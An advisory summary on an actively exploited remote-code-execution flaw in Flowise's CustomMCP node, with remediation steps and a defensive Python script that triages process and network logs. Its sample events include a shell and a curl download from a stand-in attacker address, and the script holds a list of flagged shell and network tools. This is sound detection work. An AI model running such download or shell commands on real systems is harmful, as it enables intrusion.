Critical RCE (CVE-2025-59528) in Flowise AI Agent Builder Actively Exploited, 12,000+ Deployments Exposed
What It Is – Flowise, an open-source AI “Agent Builder” platform, contains a critical code-injection flaw (CVE-2025-59528) that enables unauthenticated remote code execution. The vulnerability carries the maximum CVSS score of 10.0 and is being exploited by threat actors in the wild.
Exploitability – Public exploit code and proofs of concept have been released; multiple threat-intel feeds confirm active exploitation against live deployments.
Affected Products – Flowise AI Agent Builder (all versions prior to the forthcoming patch). The flaw resides in the CustomMCP node, which processes user‑supplied configuration data.
TPRM Impact – Organizations that have integrated Flowise into internal workflows, SaaS offerings, or customer‑facing AI services face a direct supply‑chain risk. Compromise of a single instance can lead to lateral movement, data exfiltration, or ransomware deployment across the vendor’s ecosystem.
Recommended Actions –
- Immediate containment – Disconnect all Flowise instances from the internet and block inbound traffic to the CustomMCP endpoint.
- Patch/upgrade – Apply the vendor‑released hot‑fix (or upgrade to the latest version) that sanitises the configuration parser.
- Asset inventory – Conduct a rapid sweep to identify every Flowise deployment (including on‑prem, cloud, and containerised instances).
- Log review – Search for anomalous command execution, new processes, or outbound connections originating from the CustomMCP node.
- Third‑party assessment – Notify any downstream partners that consume services built on Flowise and request evidence of remediation.
- Future hardening – Enforce least‑privilege execution contexts for AI agents and implement network segmentation for AI workloads.
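The log-review step above, as an added example that is not taken from the source article or from Flowise: it tracks the Flowise server process and every descendant across process and network events, then flags shell or downloader children and outbound connections to hosts outside an allowlist. The event field names, the sample lines, the suspicious-binary list and the allowlisted address are constructed assumptions; map them to your own EDR or auditd export.

```python
import json

# Constructed sample telemetry (JSON lines); field names and values are assumptions.
SAMPLE_EVENTS = """\
{"ts":"2025-01-01T10:00:00Z","type":"process_start","pid":410,"ppid":1,"image":"/usr/local/bin/node","cmdline":"node /usr/local/bin/flowise start"}
{"ts":"2025-01-01T10:05:12Z","type":"process_start","pid":977,"ppid":410,"image":"/bin/sh","cmdline":"sh -c id"}
{"ts":"2025-01-01T10:05:13Z","type":"process_start","pid":978,"ppid":977,"image":"/usr/bin/curl","cmdline":"curl http://203.0.113.50/a"}
{"ts":"2025-01-01T10:05:13Z","type":"net_connect","pid":978,"dest_ip":"203.0.113.50","dest_port":80}
{"ts":"2025-01-01T10:06:00Z","type":"net_connect","pid":410,"dest_ip":"10.0.5.20","dest_port":5432}
{"ts":"2025-01-01T10:07:00Z","type":"process_start","pid":1200,"ppid":1,"image":"/usr/sbin/cron","cmdline":"cron -f"}
"""

# Assumed tuning values: binaries an AI workflow server should not normally spawn,
# and destinations it is expected to reach (here, its own database).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "python3"}
ALLOWED_DESTS = {"10.0.5.20"}


def triage(lines, allowed_dests=ALLOWED_DESTS):
    """Return (ts, kind, pid, detail) findings for the Flowise process tree."""
    tracked = set()  # pids of the Flowise server and all of its descendants
    findings = []
    for raw in lines.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        if ev["type"] == "process_start":
            if ev["ppid"] in tracked:
                # Descendant of Flowise: keep following it, flag risky binaries.
                tracked.add(ev["pid"])
                name = ev["image"].rsplit("/", 1)[-1]
                if name in SUSPICIOUS_CHILDREN:
                    findings.append((ev["ts"], "child_process", ev["pid"], ev["cmdline"]))
            elif "flowise" in ev.get("cmdline", ""):
                tracked.add(ev["pid"])  # root of the tree: the server itself
        elif ev["type"] == "net_connect" and ev["pid"] in tracked:
            if ev["dest_ip"] not in allowed_dests:
                dest = f'{ev["dest_ip"]}:{ev["dest_port"]}'
                findings.append((ev["ts"], "outbound", ev["pid"], dest))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Events must be fed in chronological order so that parents are seen before their children; pid reuse over long windows is not handled.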
Source: The Hacker News – Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation